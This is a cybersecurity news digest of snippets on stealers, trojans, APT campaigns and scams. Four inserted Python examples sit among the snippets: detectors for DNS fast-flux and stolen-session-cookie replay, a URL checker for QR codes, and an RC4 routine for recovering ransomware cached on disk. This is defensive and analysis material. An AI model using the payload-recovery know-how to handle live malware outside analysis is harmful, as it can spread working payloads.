A subsequently released version has introduced a security fix that "ensures secure publication workflow for the Ultralytics package."

ComfyUI, which has Ultralytics as one of its dependencies, said it has updated ComfyUI manager to warn users if they are running one of the malicious versions.

"It seems that the malicious payload served was simply an XMRig miner, and that the mali…

1 day, 19 hours ago @ thehackernews.com
Learn How Experts Secure Privileged Accounts—Proven PAS Strategies Webinar

Even top organizations struggle to secure privileged accounts.

Traditional Privileged Access Management (PAM) solutions often fall short, leaving: blind spots that limit full visibility.

Tailored PAS Strategies: Adapting PAS best practices to your organization's needs.

This webinar is ideal for: CISOs, CTOs, and IT Managers strengthening privileged access strategies.

1 day, 22 hours ago @ thehackernews.com
Hackers Using Fake Video Conferencing Apps to Steal Web3 Professionals' Data

"The threat actors behind the malware have set up fake companies using AI to make them increase legitimacy," Cado Security researcher Tara Gould said.

Users who end up on the site are prompted to download a Windows or macOS version depending on the operating system used.

This is accomplished by means of an osascript technique that has been adopted by several macOS stealer families such as Atomic macOS Stealer, Cuckoo, MacStealer, Banshee Stealer, and Cthulhu Stealer.

]gg to propagate a stealer malware that shares overlaps with Realst.

The development comes as the threat actors behind the Banshee Stealer macOS malware shut down their operations after the leak of their source code.

1 day, 22 hours ago @ thehackernews.com
Romania Cancels Presidential Election Results After Alleged Russian Meddling on TikTok

In a historic decision, Romania's constitutional court has annulled the result of the first round of voting in the presidential election amid allegations of Russian interference.

As a result, the second round vote, which was scheduled for December 8, 2024, will no longer take place.

Călin Georgescu, who won the first round, denounced the verdict as an "officialized coup" and an attack on democracy.

That said, it's currently not clear from the document whether Georgescu was aware of the alleged campaign or assisted in it.

"The networks we have detected specifically targeting the Romanian elections have so far been small scale operations coordinated on TikTok that operated domestically," it s…

1 day, 23 hours ago @ thehackernews.com
FSB Uses Trojan App to Monitor Russian Programmer Accused of Supporting Ukraine

A Russian programmer accused of donating money to Ukraine had his Android device secretly implanted with spyware by the Federal Security Service (FSB) after he was detained earlier this year.

A further examination of the Android device has since revealed that it was indeed tampered with a trojanized version of the genuine Cube Call Recorder application.

"Most of the malicious functionality of the application is hidden in an encrypted second stage of the spyware," the Citizen Lab said.

"Once the spyware is loaded onto the phone and executed, the second stage is decrypted and loaded into memory."

The Citizen Lab said it also spotted references to iOS in the source code, suggesting that there …

2 days, 14 hours ago @ thehackernews.com
Researchers Uncover Flaws in Popular Open-Source Machine Learning Frameworks

Cybersecurity researchers have disclosed multiple security flaws impacting open-source machine learning (ML) tools and frameworks such as MLflow, H2O, PyTorch, and MLeap that could pave the way for code execution.

The vulnerabilities, discovered by JFrog, are part of a broader collection of 22 security shortcomings the supply chain security company first disclosed last month.

"An ML client is very likely to have access to important ML services such as ML Model Registries or MLOps Pipelines."

This, in turn, could expose sensitive information such as model registry credentials, effectively permitting a malicious actor to backdoor stored ML models or achieve code execution.

"To safeguard again…

2 days, 19 hours ago @ thehackernews.com
Conquering the Complexities of Modern BCDR

However, achieving these stringent goals can be a daunting task with legacy or outdated backup solutions.

Your organization must implement proactive strategies and robust BCDR solutions to effectively tackle the challenges of today's dynamic environment.

Air-gapped backups enable effective protection by isolating copies of critical data from the primary network.

With modern backup and DR solutions, your organization can recover critical workloads within hours instead of days.

Overcome modern BCDR challenges with Unitrends. In 2024, a large minority (nearly 50%) of organizations fell victim to ransomware attacks.

2 days, 19 hours ago @ thehackernews.com
More_eggs MaaS Expands Operations with RevC2 Backdoor and Venom Loader

This includes a novel information-stealing backdoor called RevC2 and a loader codenamed Venom Loader, both of which are deployed using VenomLNK, a staple tool that serves as an initial access vector for the deployment of follow-on payloads.

"Venom Loader is a new malware loader that is customized for each victim, using the victim's computer name to encode the payload."

The second campaign also begins with VenomLNK to deliver a lure image, while also stealthily executing Venom Loader.

The loader is responsible for launching More_eggs lite, a lightweight variant of the JavaScript backdoor that only provides RCE capabilities.

The disclosure comes as ANY.RUN detailed a previously undocumented f…

2 days, 22 hours ago @ thehackernews.com
Hackers Leveraging Cloudflare Tunnels, DNS Fast-Flux to Hide GammaDrop Malware

The threat actor known as Gamaredon has been observed leveraging Cloudflare Tunnels as a tactic to conceal its staging infrastructure hosting a malware called GammaDrop.

"BlueAlpha has recently started using Cloudflare Tunnels to conceal staging infrastructure used by GammaDrop, an increasingly popular technique used by cybercriminal threat groups to deploy malware," Insikt Group noted.

"BlueAlpha continues to use domain name system (DNS) fast-fluxing of GammaLoad command-and-control (C2) infrastructure to complicate tracking and disruption of C2 communications to preserve access to compromised systems."

The GammaDrop artifact is retrieved from a staging server that sits behind a Cloudflare…
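The fast-flux behaviour attributed to GammaLoad's C2 above, seen from the defender's side, as an added example that is not Insikt Group's code: resolver log lines are grouped by queried name, and a name is flagged when it resolved to many distinct addresses spread over many /24 networks with short TTLs. The log format, the thresholds, the domain names and the addresses are all constructed for the example; real telemetry would add ASN lookups, which this offline version replaces with /24 prefixes.

```python
"""Fast-flux scoring over DNS resolver logs.

Added example for the GammaLoad fast-flux description above; not Insikt
Group code. The log format, thresholds and sample records are assumptions.
"""
import re
import statistics
from collections import defaultdict

# Assumed resolver log format: "<epoch> <client> <qname> A <ttl> <answer_ip>"
LOG_RE = re.compile(
    r"^(?P<ts>\d+) (?P<client>\S+) (?P<qname>\S+) A (?P<ttl>\d+) (?P<ip>\d{1,3}(?:\.\d{1,3}){3})$"
)


def parse_log(lines):
    """Yield (qname, ttl, ip) for well-formed A-record answers; skip the rest."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m["qname"].lower().rstrip("."), int(m["ttl"]), m["ip"]


def flux_scores(lines, min_ips=5, min_prefixes=3, max_median_ttl=300):
    """Summarise each name's answers and flag fast-flux candidates.

    A name is flagged when, across the observation window, it resolved to
    at least min_ips distinct addresses spread over at least min_prefixes
    different /24 networks, with a median TTL of max_median_ttl seconds or
    less. CDN names also rotate addresses with short TTLs, but usually
    within a few provider prefixes, which is why the /24 spread matters.
    """
    ips = defaultdict(set)
    prefixes = defaultdict(set)
    ttls = defaultdict(list)
    for qname, ttl, ip in parse_log(lines):
        ips[qname].add(ip)
        prefixes[qname].add(ip.rsplit(".", 1)[0])
        ttls[qname].append(ttl)
    report = {}
    for qname in ips:
        median_ttl = statistics.median(ttls[qname])
        report[qname] = {
            "distinct_ips": len(ips[qname]),
            "distinct_prefixes": len(prefixes[qname]),
            "median_ttl": median_ttl,
            "fast_flux": (len(ips[qname]) >= min_ips
                          and len(prefixes[qname]) >= min_prefixes
                          and median_ttl <= max_median_ttl),
        }
    return report


def constructed_dns_log():
    """Constructed sample: a static name, a CDN-like name and a flux name."""
    lines = []
    for i in range(10):
        ts = 1_700_000_000 + i * 120
        # static corporate host: one address, long TTL
        lines.append(f"{ts} 10.0.0.7 www.example.test A 3600 192.0.2.10")
        # CDN-like host: short TTL, four addresses from one provider /24
        lines.append(f"{ts} 10.0.0.8 cdn.example.test A 60 203.0.113.{20 + i % 4}")
        # fast-flux C2: short TTL, a new address in a new /24 on every answer
        lines.append(f"{ts} 10.0.0.9 update.example-bad.test A 60 198.18.{i}.{40 + i}")
    lines.append("garbage line that does not parse")
    return lines


if __name__ == "__main__":
    for qname, row in sorted(flux_scores(constructed_dns_log()).items()):
        print(qname, row)
```

The thresholds are the tunable part: a short TTL alone catches every CDN, and a large address set alone catches every anycast service, so it is the combination with the prefix spread that separates the flux name from the other two in the sample.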

2 days, 23 hours ago @ thehackernews.com
This $3,000 Android Trojan Targeting Banks and Cryptocurrency Exchanges

As many as 77 banking institutions, cryptocurrency exchanges, and national organizations have become the target of a newly discovered Android remote access trojan (RAT) called DroidBot.

"Moreover, it leverages dual-channel communication, transmitting outbound data through MQTT and receiving inbound commands via HTTPS, providing enhanced operation flexibility and resilience."

Specifically, DroidBot employs HTTPS for inbound commands, whereas outbound data from infected devices is transmitted using a messaging protocol called MQTT.

"The MQTT broker used by DroidBot is organised into specific topics that categorise the types of communication exchanged between the infected devices and the C2 in…

3 days, 14 hours ago @ thehackernews.com
Critical Mitel MiCollab Flaw Exposes Systems to Unauthorized File and Admin Access

Cybersecurity researchers have released a proof-of-concept (PoC) exploit that strings together a now-patched critical security flaw impacting Mitel MiCollab with an arbitrary file read zero-day, granting an attacker the ability to access files from susceptible instances.

MiCollab is a software and hardware solution that integrates chat, voice, video, and SMS messaging with Microsoft Teams and other applications.

The SQL injection flaw was patched by Mitel in late May 2024 with the release of MiCollab version 9.8 SP1 (9.8.1.5).

"A successful exploit of this vulnerability could allow an attacker to gain unauthorized access, with potential impacts to the confidentiality, integrity, and availab…

3 days, 15 hours ago @ thehackernews.com
Europol Shuts Down Manson Market Fraud Marketplace, Seizes 50 Servers

Europol on Thursday announced the shutdown of a clearnet marketplace called Manson Market that facilitated online fraud on a large scale.

The operation, led by German authorities, has resulted in the seizure of more than 50 servers associated with the service and the arrest of two suspects.

"The stolen data was traced back to a specialised online marketplace that operated as a central hub for the trade of illegally obtained information," Europol said.

The nations that took part in the joint law enforcement collaboration include Austria, Czechia, Finland, Germany, the Netherlands, and Poland.

A 27-year-old and a 37-year-old have been arrested in Germany and Austria, respectively, in connecti…

3 days, 15 hours ago @ thehackernews.com
Hackers Target Uyghurs and Tibetans with MOONSHINE Exploit and DarkNimbus Backdoor

A previously undocumented threat activity cluster dubbed Earth Minotaur is leveraging the MOONSHINE exploit kit and an unreported Android-cum-Windows backdoor called DarkNimbus to facilitate long-term surveillance operations targeting Tibetans and Uyghurs.

An Android-based exploit kit, it's known to make use of various Chrome browser exploits with an aim to deploy payloads that can siphon sensitive data from compromised devices.

Earth Minotaur, per Trend Micro, has no direct connections to Earth Empusa.

"Earth Minotaur sends carefully crafted messages via instant messaging apps to entice victims to click an embedded malicious link," the researchers said.

The phony links lead to one of at le…

3 days, 18 hours ago @ thehackernews.com
Want to Grow Vulnerability Management into Exposure Management? Start Here!

In a recent report, How to Grow Vulnerability Management into Exposure Management (Gartner, How to Grow Vulnerability Management Into Exposure Management, 8 November 2024, Mitchell Schneider et al.

To Start, Traditional Vulnerability Management Is Limited. It surprises nobody that traditional Vulnerability Management solutions struggle to keep up with the challenges of cybersecurity today.

And that's why shifting from vulnerability management to exposure management is a critical step in making this happen.

The Bottom Line: The time to shift from Vulnerability Management to Exposure Management isn't now - it's yesterday.

Gartner, Inc. How to Grow Vulnerability Management Into Exposure Management.

3 days, 19 hours ago @ thehackernews.com
Researchers Uncover 4-Month Cyberattack on U.S. Firm Linked to Chinese Hackers

A suspected Chinese threat actor targeted a large U.S. organization earlier this year as part of a four-month-long intrusion.

According to Broadcom-owned Symantec, the first evidence of the malicious activity was detected on April 11, 2024 and continued until August.

"The attackers moved laterally across the organization's network, compromising multiple computers," the Symantec Threat Hunter Team said in a report shared with The Hacker News.

"Some of the machines targeted were Exchange Servers, suggesting the attackers were gathering intelligence by harvesting emails.

"One group the attackers were particularly interested in is 'Exchange servers,' suggesting the attackers were attempting to …

3 days, 19 hours ago @ thehackernews.com
threatpost
last post: none
DarkReading
last post: none
WeLiveSecurity
last post 1 month ago
Life on a crooked RedLine: Analyzing the infamous infostealer’s backend

To limit any possible confusion, we will use the following terms consistently throughout the text: RedLine malware: the RedLine Stealer malware or a sample thereof.

RedLine backend: collection of modules that provide authentication and functionality for the RedLine panel.

This includes the RedLine malware, the RedLine panel, and the RedLine backend modules.

Builder tab of the RedLine panel. RedLine backend: the RedLine backend we analyzed in 2023 consists of two modules.

1 month ago @ welivesecurity.com
ESET APT Activity Report Q2 2024–Q3 2024

ESET APT Activity Report Q2 2024–Q3 2024 summarizes notable activities of selected advanced persistent threat (APT) groups that were documented by ESET researchers from April 2024 until the end of September 2024.

Additionally, China-aligned APT groups have been relying increasingly on the open-source and multiplatform SoftEther VPN to maintain access to victims’ networks.

For the first time, we saw an APT group – specifically ScarCruft – abusing Zoho cloud services.

Malicious activities described in ESET APT Activity Report Q2 2024–Q3 2024 are detected by ESET products; shared intelligence is based mostly on proprietary ESET telemetry data and has been verified by ESET researchers.

Attack s…

1 month ago @ welivesecurity.com
Jane Goodall: Reasons for hope | Starmus highlights

The trailblazing scientist shares her reasons for hope in the fight against climate change and how we can tackle seemingly impossible problems and keep going in the face of adversity. Renowned ethologist and conservationist Jane Goodall offers a sobering, but hopeful reflection on the precarious state of our planet.

With ecosystems worldwide facing unprecedented threats from climate change, biodiversity loss, intensive farming, deforestation, and pollution, Earth is undergoing what scientists call the sixth mass extinction.

Unlike in the past, however, this one is driven by human activity, accelerating species loss at rates much faster than typical evolutionary processes.

Yet, Ms. Goodall – w…

1 month ago @ welivesecurity.com
Month in security with Tony Anscombe – October 2024 edition

Each month, ESET's Chief Security Evangelist Tony Anscombe will bring you a roundup of the latest cybersecurity news and insights – all in five or so minutes.

Let's cut to the chase now and review some of the most impactful cybersecurity stories of October 2024.

Recent weeks have also seen a number of damaging hacks and breaches, including one hitting American Water, the largest US water utility, and two incidents targeting The Internet Archive.

Meanwhile, lawmakers have also been busy this month, as Australia introduced its first cybersecurity legislation.

In the US, the Cybersecurity and Infrastructure Security Agency (CISA) proposed new security requirements to protect personal and gover…

1 month, 1 week ago @ welivesecurity.com
How to remove your personal information from Google Search results

If not, consider requesting the removal of your personal information from search results.

What shows up in Google Search?

Unsurprisingly, the search results become more specific, showcasing how powerful search engines are at pinpointing someone’s data.

How to use Google’s “Results about you”

To use this feature, you need to have a Google account.

For the browser version, follow these steps: Log into your Google account and click on your profile avatar.

1 month, 1 week ago @ welivesecurity.com
Don't become a statistic: Tips to help keep your personal data off the dark web

The dark web is thriving

First things first: Contrary to popular assumption, the dark web is not illegal and it’s not populated solely by cybercriminals.

Even worse, 700 of these emails had passwords associated with them stored in plain text and exposed on dark web sites.

There are various ways your own data could end up in a dark web forum or site.

If you’re signed up to an identity protection or dark web monitoring service, it should flag any PII or other data it finds on the dark web.

See what’s lurking out there on the dark web right now and it may never get to that stage.

1 month, 1 week ago @ welivesecurity.com
Tony Fadell: Innovating to save our planet | Starmus highlights

So what's the real story with methane and how exactly do the emissions of this powerful greenhouse gas accelerate climate change?

Increased awareness of methane’s potent warming effect and the urgency of reducing methane emissions have prompted a slew of methane-reducing initiatives.

To get a grip on the problem, however, the world first needs to identify emission sources with pinpoint accuracy.

This is where state-of-the-art satellite technology comes in.

In his talk, the legendary engineer and entrepreneur Tony Fadell talks about MethaneSAT, a pioneering satellite that orbits the planet in order to map and track the sources of methane emissions primarily from oil and gas operations, which…

1 month, 1 week ago @ welivesecurity.com
CloudScout: Evasive Panda scouting cloud services

The CloudScout toolset is capable of retrieving data from various cloud services by leveraging stolen web session cookies.

CloudScout utilizes stolen cookies, provided by MgBot plugins, to access and exfiltrate data stored at various cloud services.

In February 2023, CloudScout modules and the Nightdoor implant were detected at what we suspect is a Taiwanese government entity.

The CloudScout module obtains a new configuration by continuously monitoring its working directory, looking for files with .dat extensions.

This package is stored in the resources section of CloudScout modules and is loaded at the beginning of the ModuleStart function.
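The passage above describes the core of CloudScout: a valid web session cookie, lifted from the victim's browser by MgBot plugins, is replayed against the cloud service from the attacker's own machine. The Python below is an added example of the defender's side of that technique; it is not ESET's code and not part of the original article. It runs two replay heuristics over a constructed access log (the log format, field names, IP addresses and user agents are all made up for the demo) and flags a session whose cookie is suddenly presented with a different User-Agent, or from a second IP address within a short window.

```python
"""Session-cookie replay heuristics over a constructed access log (added example)."""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class AccessEvent:
    ts: datetime
    session_id: str
    user: str
    ip: str
    user_agent: str


@dataclass(frozen=True)
class Alert:
    rule: str          # "ua_change" or "concurrent_ips"
    session_id: str
    user: str
    origin_ip: str     # where the session was first seen
    ip: str            # where the suspicious use came from
    ts: datetime


def parse_access_line(line: str) -> AccessEvent:
    """Parse one line of the constructed 'ts|session|user|ip|user-agent' format.
    Real services log this differently; adapt the split to the source."""
    ts, sid, user, ip, ua = line.strip().split("|", 4)
    return AccessEvent(datetime.fromisoformat(ts), sid, user, ip, ua)


def detect_session_replay(events, concurrent_window: timedelta = timedelta(minutes=10)) -> list[Alert]:
    """Flag session cookies that look like they are being presented by a client
    other than the one that established the session.

    Rule 1 (ua_change): a browser does not change its User-Agent mid-session, so a
    cookie that arrives with a new UA is being replayed from another client.
    Rule 2 (concurrent_ips): the same cookie used from two IP addresses within
    `concurrent_window` means two parties hold it at once.
    """
    alerts: list[Alert] = []
    origin: dict[str, AccessEvent] = {}                 # session_id -> first event
    last_by_ip: dict[str, dict[str, AccessEvent]] = {}  # session_id -> ip -> last event
    for ev in sorted(events, key=lambda e: e.ts):
        sid = ev.session_id
        if sid not in origin:
            origin[sid] = ev
        else:
            first = origin[sid]
            if ev.user_agent != first.user_agent:
                alerts.append(Alert("ua_change", sid, ev.user, first.ip, ev.ip, ev.ts))
            for other_ip, other in last_by_ip.get(sid, {}).items():
                if other_ip != ev.ip and ev.ts - other.ts <= concurrent_window:
                    alerts.append(Alert("concurrent_ips", sid, ev.user, first.ip, ev.ip, ev.ts))
                    break
        last_by_ip.setdefault(sid, {})[ev.ip] = ev
    return alerts


# Constructed sample: one normal session and one whose cookie was stolen and
# replayed from a scripted client three minutes after the victim logged in.
SAMPLE_LOG = """\
2024-10-01T09:00:00|s-legit|alice|203.0.113.5|Mozilla/5.0 (Windows NT 10.0) Chrome/129.0
2024-10-01T09:04:00|s-legit|alice|203.0.113.5|Mozilla/5.0 (Windows NT 10.0) Chrome/129.0
2024-10-01T09:00:30|s-stolen|bob|198.51.100.7|Mozilla/5.0 (Windows NT 10.0) Chrome/129.0
2024-10-01T09:03:00|s-stolen|bob|192.0.2.44|python-requests/2.32
2024-10-01T09:05:00|s-stolen|bob|198.51.100.7|Mozilla/5.0 (Windows NT 10.0) Chrome/129.0
"""


def run_sample() -> list[Alert]:
    """Parse the constructed log and return the alerts it produces."""
    events = [parse_access_line(l) for l in SAMPLE_LOG.splitlines() if l.strip()]
    return detect_session_replay(events)


if __name__ == "__main__":
    for a in run_sample():
        print(f"{a.ts.isoformat()} {a.rule:15} session={a.session_id} user={a.user} "
              f"origin={a.origin_ip} seen_from={a.ip}")
```

Rule 1 is cheap but brittle: a stealer that exports the browser's cookies can just as easily copy its User-Agent, so the concurrent-IP rule (and, in production, ASN or geolocation comparison) does the real work. Detection after the fact is also only half the answer. The page's point is that the cookie itself is the credential, so short session lifetimes and step-up re-authentication for sensitive cloud actions limit what a stolen one is worth.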

1 month, 1 week ago @ welivesecurity.com
ESET Research Podcast: CosmicBeetle

Then there are threat actors like CosmicBeetle – they lack the necessary skill set, write crude malware, yet still compromise interesting targets, and achieve “stealth” by using odd, impractical and overcomplicated techniques.

Discussing further with ESET Research Podcast host and Distinguished Researcher Aryeh Goretsky, Jakub shared his view of CosmicBeetle’s encryption routine, information about their victimology, and details of their “involvement” with high-profile gangs such as LockBit and RansomHub.

For details on how this crude and clumsy threat actor, whose malicious tools are “riddled with bugs”, managed to penetrate any of its targets, listen to this ESET Research Podcast episode…

1 month, 2 weeks ago @ welivesecurity.com
Embargo ransomware: Rock’n’Rust

ESET researchers have discovered new Rust-based tooling leading to the deployment of Embargo ransomware.

C:\Windows\Debug\a.cache: RC4-encrypted Embargo ransomware.

C:\Windows\Debug\pay.exe: Decrypted Embargo ransomware.

Tactic | ID | Name | Description
Resource Development | T1587.001 | Develop Capabilities: Malware | Embargo group develops its custom toolkit – MDeployer, MS4Killer, and Embargo ransomware.
Impact | T1486 | Data Encrypted for Impact | Embargo ransomware encrypts files on compromised machines.
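The two file entries above say the on-disk a.cache is the RC4-encrypted ransomware and pay.exe its decrypted form. The Python below is an added example, not ESET's or the Embargo group's code and not part of the original article: a plain RC4 implementation plus a PE-header sanity check, so an analyst can try candidate keys against such a cached blob and know when one has worked. The key b"example-key" and the minimal fake PE are constructed for the demonstration; the page says nothing about how the real loader derives its key, so only the triage loop is shown.

```python
"""RC4 decryption of a cached payload, with a PE sanity check (added example)."""
from __future__ import annotations

from typing import Iterator


def rc4_keystream(key: bytes) -> Iterator[int]:
    """Standard RC4: key-scheduling algorithm followed by the PRGA byte generator."""
    if not key:
        raise ValueError("RC4 key must be non-empty")
    S = list(range(256))
    j = 0
    for i in range(256):                       # KSA
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:                                # PRGA
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 is a stream cipher, so the same call encrypts and decrypts."""
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)


def looks_like_pe(blob: bytes) -> bool:
    """Cheap check that a decrypted blob is a Windows executable: 'MZ' DOS header
    and e_lfanew (offset 0x3C) pointing at 'PE' followed by two NUL bytes."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def try_decrypt_cache(blob: bytes, candidate_keys: list[bytes]):
    """Try each candidate key against an on-disk cache blob; return (key, plaintext)
    for the first that yields a PE, or None. The real key derivation is not
    described on this page, so this only automates the analyst's triage loop."""
    for key in candidate_keys:
        pt = rc4(key, blob)
        if looks_like_pe(pt):
            return key, pt
    return None


def build_fake_pe() -> bytes:
    """Constructed stand-in for a payload: 64-byte DOS header with e_lfanew = 0x40,
    followed by the PE signature and some padding. Not a runnable binary."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    dos[0x3C:0x40] = (0x40).to_bytes(4, "little")
    return bytes(dos) + b"PE\x00\x00" + b"\x00" * 20


if __name__ == "__main__":
    # Simulate what a loader leaves on disk, then recover it as an analyst would.
    cache = rc4(b"example-key", build_fake_pe())       # the key is a constructed assumption
    found = try_decrypt_cache(cache, [b"wrong", b"also-wrong", b"example-key"])
    print("recovered with key:", found[0] if found else None)
```

The PE check is what makes key guessing practical: RC4 gives no error on a wrong key, only garbage, so the analyst needs a cheap oracle for "this decrypted correctly", and the MZ/PE structure is that oracle for an executable payload.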

1 month, 2 weeks ago @ welivesecurity.com
Google Voice scams: What are they and how do I avoid them?

The classic Google Voice scam goes something like this: Setting up a Google Voice account.

The fraudster downloads the Google Voice app and links it to a Google account, much like anyone else does.

Then they may do one of several things: sell your Google Voice number and account to other scammers; place vishing calls designed to scam victims, using your Google Voice account; embed your Google Voice number into email phishing or smishing messages; use the Google Voice voicemail feature to record messages posing as legitimate authorities, in order to further their scams; use the Google Voice num…

1 month, 2 weeks ago @ welivesecurity.com
Threat actors exploiting zero-days faster than ever – Week in security with Tony Anscombe

The rest of the software flaws under review were exploited as n-days; i.e., vulnerabilities first exploited after patches are made available (versus zero days, which are abused before patches are released).

The average time to exploit a software flaw has been shrinking considerably over the years – from 63 days in 2018-2019 all the way to only five days last year.

These and other figures in the report underscore a disconcerting trend: threat actors are rapidly getting better at spotting and weaponizing software vulnerabilities, which clearly poses an escalating threat to businesses and individuals alike.

What else did the report find and how does the market for zero-day exploits factor into…

1 month, 3 weeks ago @ welivesecurity.com
Protecting children from grooming | Unlocked 403 cybersecurity podcast (ep. 7)

“Hey, wanna chat?” This innocent phrase can take on a sinister meaning when it comes from an adult to a child online and even be the start of a predatory relationship

“Hey, wanna chat?” What sounds like a casual and innocent phrase between adults can take a sinister turn when it comes from an adult to a child online – and even be the start of a predatory relationship.

Grooming, where an adult uses psychological tactics to gain a child’s trust in order to manipulate, exploit, or abuse them, is a pervasive problem these days.

It often occurs online, where predators may use social media, gaming platforms, or messaging apps to contact minors.

In this episode of Unlocked 403, Becks sat down with ch…

1 month, 3 weeks ago @ welivesecurity.com
Quishing attacks are targeting electric car owners: Here’s how to slam on the brakes

Although QR codes have been around since the 90s, quishing as a threat really started to appear during the pandemic.

Fraudsters leapt into action, sticking fake QR codes over the real ones.

There have been a number of reports about scammers targeting motorists via malicious QR codes stuck to parking meters.

If you’re uncomfortable scanning a QR code, consider using one of these alternatives to avoid the risk of interacting with a fraudulent code.

News of the latest QR quishing campaign will only increase calls for codes to be banned from public places.
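The advice above is aimed at drivers, but the same checks can be mechanised for anyone vetting the URL a QR code decodes to. The Python below is an added example, not code from the original article: it takes the already-decoded string (reading the image itself is out of scope here) and returns a list of red flags. The operator allowlist, the brand name and every URL used are constructed for the demonstration; a real deployment would take the allowlist from the charging network it protects and use the Public Suffix List instead of the naive last-two-labels domain split used here.

```python
"""Red-flag checks for a URL decoded from a QR code (added example)."""
from __future__ import annotations

import ipaddress
from urllib.parse import urlsplit

# Constructed allowlist for the demonstration: the domains the charging operator
# is assumed to use. A real deployment takes this from the operator being protected.
TRUSTED_OPERATOR_DOMAINS = {"evcharge.example", "pay.evcharge.example"}
KNOWN_SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl"}


def registered_domain(host: str) -> str:
    """Naive eTLD+1 (last two labels). Good enough for the demo; production code
    should use the Public Suffix List so that e.g. 'example.co.uk' is handled."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def vet_qr_url(raw: str, trusted: set[str] = TRUSTED_OPERATOR_DOMAINS) -> list[str]:
    """Return the red flags found in an already-decoded QR payload; an empty list
    means the URL is HTTPS, on an operator domain, and free of the usual tricks."""
    flags: list[str] = []
    parts = urlsplit(raw.strip())
    host = (parts.hostname or "").lower()

    if parts.scheme not in ("http", "https"):
        flags.append(f"unexpected scheme {parts.scheme!r}")
    elif parts.scheme == "http":
        flags.append("plain http")
    if not host:
        flags.append("no host")
        return flags
    if is_ip_literal(host):
        flags.append("IP-literal host")
    if "xn--" in host:
        flags.append("punycode/IDN label")          # possible homoglyph domain
    if parts.username or parts.password:
        flags.append("credentials in URL")          # 'https://evcharge.example@evil.tld/' style
    if registered_domain(host) in KNOWN_SHORTENERS:
        flags.append("URL shortener hides destination")

    trusted_reg = {registered_domain(t) for t in trusted}
    reg = registered_domain(host)
    if reg not in trusted_reg:
        flags.append(f"host {host} is not on an expected operator domain ({', '.join(sorted(trusted_reg))})")
        # The classic sticker scam: the brand appears as a subdomain of an unrelated registered domain.
        for brand in {t.split(".")[0] for t in trusted_reg}:
            if brand in host.split(".")[:-2]:
                flags.append(f"brand {brand!r} used as a subdomain lookalike")
    return flags


if __name__ == "__main__":
    for url in ("https://pay.evcharge.example/session/123",          # constructed, legitimate
                "https://pay.evcharge.example.charge-now.tld/login",  # constructed lookalike
                "http://192.0.2.10/pay"):                             # constructed, plain http + IP
        print(url, "->", vet_qr_url(url) or "OK")
```

The lookalike rule is the one that matters for the sticker scams the article describes: a fraudster can register any domain and put the operator's brand in front of it, so the decision has to rest on the registered domain, never on whether a familiar name appears somewhere in the host.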

1 month, 3 weeks ago @ welivesecurity.com
Aspiring digital defender? Explore cybersecurity internships, scholarships and apprenticeships

In this blog, we’ll explore cybersecurity internships, scholarships and apprenticeships as three great pathways, especially for young people, to jump-start their careers in this exciting and rewarding field.

For example, ESET currently runs Women in Cybersecurity scholarships for female undergraduates looking to pursue a career in cybersecurity in the UK, US, Canada and Australia.

Some cybersecurity apprenticeships prepare you for industry certifications that validate the training and expertise learned, enhancing employability further down the line.

Job security: Almost all industries require cybersecurity, including health, government, education, law, financial services, and manufacturing…

1 month, 3 weeks ago @ welivesecurity.com
Naked Security
last post: none
Help Net Security
last post 1 hour ago
Who handles what? Common misconceptions about SaaS security responsibilities

In this Help Net Security interview, James Dolph, CISO at Guidewire, addresses common misconceptions about security responsibilities in cloud environments, particularly in SaaS, and how these misunderstandings can lead to security risks.

SaaS providers and their customers both care deeply about security, compliance, and meeting global regulations.

This can lead to misunderstandings, either assuming the SaaS provider handles everything or overcompensating by duplicating efforts.

In an incident response scenario, how should the roles and responsibilities be divided between the SaaS provider and the customer?

Beyond reviews, some SaaS providers allow customers to conduct their own security ass…

1 hour ago @ helpnetsecurity.com
What makes for a fulfilled cybersecurity career

In this Help Net Security video, Richard Hummel, NETSCOUT’s Director of Threat Intelligence, talks about his journey into cybersecurity and offers insight for those that are interested in pursuing it as a career.

1 hour ago @ helpnetsecurity.com
Top cybersecurity books for your holiday gift list

To help with ideas on what to give, we’ve compiled a list of cybersecurity books to consider.

Author: Richard Stiennon

In the book, you’ll find a comprehensive directory of cybersecurity vendors, updated for 2024, complete with headquarters location, category, sub-category, number of employees, and growth trends.

Whether you’re concerned about secure password practices, safeguarding your privacy, or defending against cyber attacks, this book covers it all.

Author: Steve Wilson

This book delivers practical strategies to help developers and security teams grapple with the realities of LLM applications.

Authors: Robert Lelewski and John Hollenberger

Written by veteran security consultants, this b…

2 hours ago @ helpnetsecurity.com
Businesses plagued by constant stream of malicious emails

36.9% of all emails received by businesses (20.5 billion) in 2024 were unwanted, according to Hornetsecurity’s analysis of 55.6+ billion emails processed through their security services between November 1, 2023 and October 31, 2024 – and 2.3% of those contained malicious content, totalling 427.8 million emails.

Once again, phishing remains the most prevalent form of attack, responsible for a third of all cyber-attacks in 2024.

This was confirmed by the analysis of 55.6 billion emails, showing that phishing remains a top concern consistently year over year.

“With over 427 million malicious emails still reaching inboxes, it’s clear that cybersecurity strategies must evolve to stay ahead of in…

2 hours ago @ helpnetsecurity.com
Week in review: Veeam Service Provider Console flaws fixed, Patch Tuesday forecast

December 2024 Patch Tuesday forecast: The secure future initiative impact

It seems like 2024 just started, but the final Patch Tuesday of the year is almost here!

SafeLine: Open-source web application firewall (WAF)

SafeLine is an open-source and self-hosted Web Application Firewall (WAF) that protects websites from cyber attacks.

Inside the 2024 CWE Top 25: Trends, surprises, and persistent challenges

